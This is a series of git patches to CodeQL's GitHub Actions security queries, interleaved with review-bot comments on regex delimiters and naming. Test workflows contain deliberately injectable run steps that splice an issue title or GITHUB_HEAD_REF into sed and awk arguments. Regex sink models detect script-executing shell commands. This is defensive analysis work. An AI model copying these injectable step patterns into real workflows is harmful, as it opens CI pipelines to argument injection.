"(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + ) } /** 
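Review bot: The suffix alternation `(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)` accepts a letter or `-` directly after the command match, so a model whose `sub_regexp` ends at the command name would also fire on a longer word (`make` inside `cat makefile`, `npm` inside `npm-check`); the `\\b` in the prefix only guards the left edge. I cannot see the command models from this hunk, so if they already end in `\\s` this is moot; otherwise dropping `-` and `[a-zA-Z]` from the suffix, or appending `\\b` after `sub_regexp`, makes the right edge as tight as the left. The `// find regexp` comment says nothing about why this particular terminator set was chosen; one sentence such as `// a command name must be followed by a shell separator so that longer words do not match` would carry the intent.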
@@ -61,7 +65,26 @@ predicate poisonableCommandsDataModel(string regexp) { * - group: Script capture group number for the regular expression */ predicate poisonableLocalScriptsDataModel(string regexp, int group) { - Extensions::poisonableLocalScriptsDataModel(regexp, group) + exists(string sub_regexp | + Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) +} + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) } /** @@ -82,17 +105,3 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } - -/** - * MaD models for arguments to commands that execute the given argument. - * Fields: - * - regexp: Regular expression for matching argument injections. - * - command_group: capture group for the command. - * - argument_group: capture group for the argument. - */ -predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - exists(string sub_regexp | - Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" - ) -} 
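Review bot: The relocated `argumentInjectionSinksDataModel` is not a pure move: the removed body delimited on `(^|;|\\$\\(|`|\\||&&)` / `(;|\\||\\)|`|-|&&|$)`, while the new body also accepts `\\|\\|` on both sides, so `a || sed ...` now matches where it did not before. A commit titled "Move regexp delimiters" should state that behaviour change in its message, or carry it as a separate commit so the expected-output diffs can be attributed to it. The `// capture regexp` comment would be more useful as `// anchored on shell separators; `.*` on both ends because this regexp is used with regexpCapture, not regexpFind`.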
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 34246fa4e8f7..6a218ac08f1e 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,12 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists( - this.getScript() - .splitAt("\n") - .trim() - .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _) - ) + exists(this.getScript().splitAt("\n").trim().regexpFind(regexp, _, _)) ) } } @@ -46,9 +41,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = - line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", - group) + cmd = line.regexpCapture(regexp, group) ) } From 89024ad6048ba00083b23b4c8946ec5cd8df4c7d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:58:20 +0200 Subject: [PATCH 402/707] fix(models): Reuse command delimiter regexps --- ql/lib/codeql/actions/config/Config.qll | 19 ++++++++++++++----- .../security/ArtifactPoisoningQuery.qll | 5 ++++- .../actions/security/PoisonableSteps.qll | 8 +++++--- ql/lib/ext/config/poisonable_steps.yml | 16 ++++++++-------- .../.github/workflows/poisonable_steps.yml | 1 + .../ArgumentInjectionCritical.expected | 2 ++ .../CWE-094/ArgumentInjectionMedium.expected | 1 + 7 files changed, 35 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 3b273302fec3..efd8b26510b7 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll 
@@ -45,6 +45,12 @@ predicate externallyTriggerableEventsDataModel(string event) { Extensions::externallyTriggerableEventsDataModel(event) } +private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } + +private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } + +private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } + /** * MaD models for poisonable commands * Fields: @@ -54,7 +60,8 @@ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and // find regexp - regexp = "(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + regexp = + commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() ) } @@ -64,11 +71,13 @@ predicate poisonableCommandsDataModel(string regexp) { * - regexp: Regular expression for matching poisonable local scripts * - group: Script capture group number for the regular expression */ -predicate poisonableLocalScriptsDataModel(string regexp, int group) { +predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | - Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = + ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + + ".*" ) } 
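Review bot: The doc comment above `poisonableLocalScriptsDataModel` still lists `- group: Script capture group number for the regular expression` while the parameter is now `command_group`; update it to `- command_group: capture group that yields the executed command` so readers are not sent looking for a field that no longer exists. The three new private helpers carry no comment at all; one line each would do, e.g. `/** Wrappers that may precede a command without changing which program runs. */` on `commandLauncher()` and `/** Shell separators that may appear before/after a command on a line. */` on the two delimiter predicates. Note also that `commandLauncher()` only admits the bare launcher followed by whitespace, so `sudo -E make` or `sudo -n npm ci` is not recognised; if options are meant to be covered, `"sudo(\\s+-\\S+)*\\s+"` would admit them. I cannot see the poisonable_steps.yml command models from here, so whether they tolerate options themselves is unverified.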
@@ -83,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d2853591d61e..dd409bdbae28 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -255,7 +255,10 @@ class ArtifactPoisoningSink extends DataFlow::Node { ) and ( not poisonable instanceof LocalScriptExecutionRunStep or - poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") + poisonable + .(LocalScriptExecutionRunStep) + .getCommand() + .matches(["./", ""] + download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 6a218ac08f1e..5dd0081f61e9 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -39,9 +39,11 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + exists(string line, string regexp, int command_group | + line = this.getScript().splitAt("\n").trim() + | + poisonableLocalScriptsDataModel(regexp, command_group) and + cmd = line.regexpCapture(regexp, command_group) ) } 
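Review bot: `argumentInjectionSinksDataModel` is the only one of the three wrappers that does not splice `commandLauncher()` between `commandPrefixDelimiter()` and `sub_regexp`, so `sudo sed "s/x/$TITLE/" file` is not a sink while the same line without `sudo` is. The launcher strings contain no capture group, so inserting `commandLauncher()` here, `regexp = ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + ".*"`, would not shift `command_group` or `argument_group`. If the omission is deliberate, a one-line comment saying why would keep it from being read as an oversight.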
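Review bot: `.matches(["./", ""] + download.getPath() + "%")` is a LIKE-style prefix test in which `_` is a single-character wildcard and `%` matches any suffix, so a download path `build` also accepts `./builder/run.sh` and a path `dist_v2` accepts `distXv2`; artifact names with underscores are common, so the wildcard is likely to fire unintentionally. The trailing `%` is presumably needed because the captured command may carry arguments (`foo.sh arg1`), but the `_` case could be closed by escaping it in the path or by comparing `getCommand().prefix(download.getPath().length())` with the path directly. The `ArtifactPoisoningSink` characteristic predicate this sits in starts and ends outside the hunk.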
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 07fc7c7af73d..7f07f696445c 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -57,12 +57,12 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)", 3] - - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate - - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - - ["(python)\\s+(.*)\\.py", 3] - - ["(ruby)\\s+(.*)\\.rb", 3] - - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4] - - ["(dotnet)\\s+(.*)\\.csproj", 3] + - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] + - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3] + - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3] + - ["(python)\\s+(.*?)\\.py(.*?)", 3] + - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3] + - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4] + - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 37ec9c9ff716..fad7001ad5a9 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -38,3 +38,4 @@ jobs: - run: sed -f config file.txt > foo.txt - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo + - run: ./foo/cmd diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 13f4954eac37..b5d25bf0d135 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected 
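Review bot: The second model now captures `(\\.\\s+[a-zA-Z0-9\\-_\\./]+)` as group 2, so for `. venv/bin/activate` the reported command is `. venv/bin/activate` including the dot and whitespace, whereas the removed `["(\\.\\s+)(.*)", 3]` returned only the path. `ArtifactPoisoningSink` in this commit compares that command against `["./", ""] + download.getPath() + "%"`, which cannot match a string beginning with `. `, so sourced scripts appear to stop being artifact-poisoning sinks unless something I cannot see strips the prefix. Capturing only the path, `["\\.\\s+([a-zA-Z0-9\\-_\\./]+)(.*?)", 2]`, keeps the new character class and restores the old result. The class also excludes `$`, `{` and `~`, so `./${SCRIPT_DIR}/run.sh` is no longer recognised by the first model; if that is intended, the `# TODO` comment above should say so.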
@@ -9,9 +9,11 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 67f728705f41..dfbf87174cc1 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -9,5 +9,6 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select From 3f8a791b2e5b7a7a82a22b475999c58f56d05112 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:59:20 +0200 Subject: [PATCH 403/707] fix(queries): Improve Argument Injection query Add GITHUB_HEAD_REF as a source --- .../security/ArgumentInjectionQuery.qll | 29 +++++++++++++++++-- .../security/UntrustedCheckoutQuery.qll | 2 +- .../.github/workflows/arg_injection.yml | 5 ++++ 3 files changed, 32 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index bf29a1c8458f..c13db5b81275 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll 
@@ -23,8 +23,19 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink {
 ArgumentInjectionFromEnvVarSink() { exists(Run run, string var_name | envToArgInjSink(var_name, run, command) and
- exists(run.getInScopeEnvVarExpr(var_name)) and
- run.getScriptScalar() = this.asExpr()
+ run.getScriptScalar() = this.asExpr() and
+ exists(run.getInScopeEnvVarExpr(var_name))
+ )
+ or
+ exists(
+ Run run, string line, string argument, string regexp, int argument_group, int command_group
+ |
+ run.getScript().splitAt("\n") = line and
+ run.getScriptScalar() = this.asExpr() and
+ argumentInjectionSinksDataModel(regexp, command_group, argument_group) and
+ argument = line.regexpCapture(regexp, argument_group) and
+ command = line.regexpCapture(regexp, command_group) and
+ argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*")
 ) }
@@ -45,7 +56,19 @@ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink {
 * that is used to construct and evaluate a code script. */ private module ArgumentInjectionConfig implements DataFlow::ConfigSig {
- predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+ predicate isSource(DataFlow::Node source) {
+ source instanceof RemoteFlowSource
+ or
+ exists(
+ Run run, string argument, string line, string regexp, int command_group, int argument_group
+ |
+ run.getScriptScalar() = source.asExpr() and
+ run.getScript().splitAt("\n") = line and
+ argumentInjectionSinksDataModel(regexp, command_group, argument_group) and
+ argument = line.regexpCapture(regexp, argument_group) and
+ argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*")
+ )
+ }
 predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } }
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index a0bf48f9beb8..be0229a77c4b 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
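Review bot: The new `exists(...)` disjunct in `ArgumentInjectionFromEnvVarSink` and the one added to `isSource` in the second hunk are the same match (`run.getScript().splitAt("\n")`, `argumentInjectionSinksDataModel`, `regexpCapture`, and the `GITHUB_HEAD_REF` regex) written out twice, so the two will drift apart the next time the pattern changes; factoring it into one predicate, say `headRefArgInjSink(Run run, string command)`, and calling it from both would also make the source/sink relationship explicit. The regex `".*\\$(\\{)?(GITHUB_HEAD_REF).*"` has no trailing boundary, so a longer variable whose name merely starts with `GITHUB_HEAD_REF` matches as well, and it omits the `$ENV{...}` form that `envToRunExpr` accepts via `["", "{", "ENV{"]`; `".*\\$(\\{|ENV\\{)?GITHUB_HEAD_REF\\b.*"` would align the two. Since both the source and the sink are `run.getScriptScalar()`, the reported path is a single node; if that is deliberate, a one-line comment on the `isSource` disjunct saying so would save the next reader from suspecting a missing step. Nothing here constrains the triggering event, so workflows in which `GITHUB_HEAD_REF` is not attacker-influenced (push-only workflows, for example) appear to be flagged too; unless that is filtered elsewhere, it is worth stating in the query's help text.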
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -62,7 +62,7 @@ predicate containsHeadRef(string s) {
 // heuristics
 "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", // env vars
- "\\benv\\.GITHUB_HEAD_REF\\b",
+ "GITHUB_HEAD_REF",
 ], _, _) ) }
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml
index 0956aea61bdb..3f2f30a78a03 100644
--- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml
@@ -15,3 +15,8 @@ jobs:
 - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar
 - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar)
 - run: awk "BEGIN {$TITLE}"
+ - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json
+ - run: |
+ # We consider | as a shell pipe so this one is not reported yet until
+ # we can better identify all the commands in a shell script
+ sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json
From c5d31ce08c1d66a7965d79ee805927efd68605d1 Mon Sep 17 00:00:00 2001
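Review bot: Replacing `"\\benv\\.GITHUB_HEAD_REF\\b"` with the bare `"GITHUB_HEAD_REF"` in `containsHeadRef` drops both word boundaries, so the heuristic now also fires on any longer identifier that merely contains that substring, which is out of step with the `\\b`-delimited entries listed just before it. If the goal is to cover `$GITHUB_HEAD_REF`, `${GITHUB_HEAD_REF}` and `env.GITHUB_HEAD_REF` alike, `"\\bGITHUB_HEAD_REF\\b"` does that while keeping the boundary convention (since `_` is a word character, longer names built on the same prefix would still be excluded). The body of `containsHeadRef` starts before this hunk.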
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:13:49 +0200 Subject: [PATCH 404/707] fix(refactor): Add comments and rename predicates --- .../codeql/actions/dataflow/ExternalFlow.qll | 43 ++++++++++++------- .../codeql/actions/dataflow/FlowSources.qll | 4 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 +++++++-------- .../dataflow/internal/DataFlowPrivate.qll | 18 +++----- .../security/ArgumentInjectionQuery.qll | 2 +- .../actions/security/CodeInjectionQuery.qll | 2 +- .../security/CommandInjectionQuery.qll | 2 +- .../security/EnvPathInjectionQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../actions/security/RequestForgeryQuery.qll | 2 +- .../security/SecretExfiltrationQuery.qll | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- 13 files changed, 61 insertions(+), 57 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 2cb8c56b147f..1d1b0c6a7199 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -10,7 +10,9 @@ private import actions * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { +predicate actionsSourceModel( + string action, string version, string output, string kind, string provenance +) { Extensions::actionsSourceModel(action, version, output, kind, provenance) } 
@@ -39,12 +41,17 @@ predicate actionsSummaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { +predicate actionsSinkModel( + string action, string version, string input, string kind, string provenance +) { Extensions::actionsSinkModel(action, version, input, kind, provenance) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(Uses uses, string action, string version, string kind | +/** + * Holds if source.fieldName is a MaD-defined source of a given taint kind. + */ +predicate madSource(DataFlow::Node source, string kind, string fieldName) { + exists(Uses uses, string action, string version | actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( 
@@ -59,36 +66,40 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri if fieldName.trim().matches("output.%") then source.asExpr() = uses else none() - ) and - sourceType = kind + ) ) } -predicate externallyDefinedStoreStep( - DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -) { +/** + * Holds if the data flow from `pred` to `succ` is a MaD store step. + */ +predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Uses uses, string action, string version, string input, string output | actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and + // version check ( if version.trim() = "*" then uses.getVersion() = any(string v) else uses.getVersion() = version.trim() ) and + // pred provenance ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) - else - if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) - else none() + input.trim().matches("env.%") and + pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) ) and succ.asExpr() = uses ) } -predicate externallyDefinedSink(DataFlow::Node sink, string kind) { +/** + * Holds if sink is a MaD-defined sink for a given taint kind. + */ +predicate madSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 34f8c76df67d..31cf33782b0b 100644 
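Review bot: The comment `// pred provenance` in `madStoreStep` reuses "provenance", which in this file's model documentation names the verification column (`provenance: verification of the model`), so a reader may take it to refer to the `_` argument passed to `actionsSummaryModel`; `// pred is the modelled input: an in-scope env var (env.*) or an action input (input.*)` says what the disjunction actually selects. The new `/** ... */` headers on `madStoreStep` and `madSink` name no parameters; for `madStoreStep` it would help to state that `c` is the `FieldContent` named by the model's `output.*` column with the prefix stripped and that `succ` is the `Uses` step itself. Rewriting the nested `if`/`then`/`else none()` as two `and`-guarded disjuncts looks behaviour-preserving as far as the hunk shows, since the `env.%` and `input.%` guards are disjoint.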
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -95,10 +95,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { /** * A Source of untrusted data defined in a MaD specification */ -class ExternallyDefinedSource extends RemoteFlowSource { +class MaDSource extends RemoteFlowSource { string sourceType; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index a40e11bda956..5e624798d69a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,14 +23,18 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -bindingset[var_name, value] -predicate envToRunExpr(string var_name, Run run, string value) { +/** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ +bindingset[var_name, expr] +predicate envToRunExpr(string var_name, Run run, string expr) { // e.g. echo "FOO=$BODY" >> $GITHUB_ENV // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var_name) > 0 or // e.g. // FOO=$(echo $BODY) 
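Review bot: The new doc comment on `envToRunExpr` reads "Holds if and environment variable is used ... in a Run's step expression. Where the expression ..."; "and" should be "an", and the second sentence is a fragment that leaves it unclear which parameter is the expression. Something like `Holds if the environment variable var_name is used, directly or indirectly, in expr, a string captured from the script of run. Both var_name and expr must be bound by the caller (see the bindingset).` ties the text to the parameters. The same "Where the command is a string captured from the Run's script." fragment appears in the comment added to `envToArgInjSink` in the next hunk and could be folded into its first sentence the same way.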
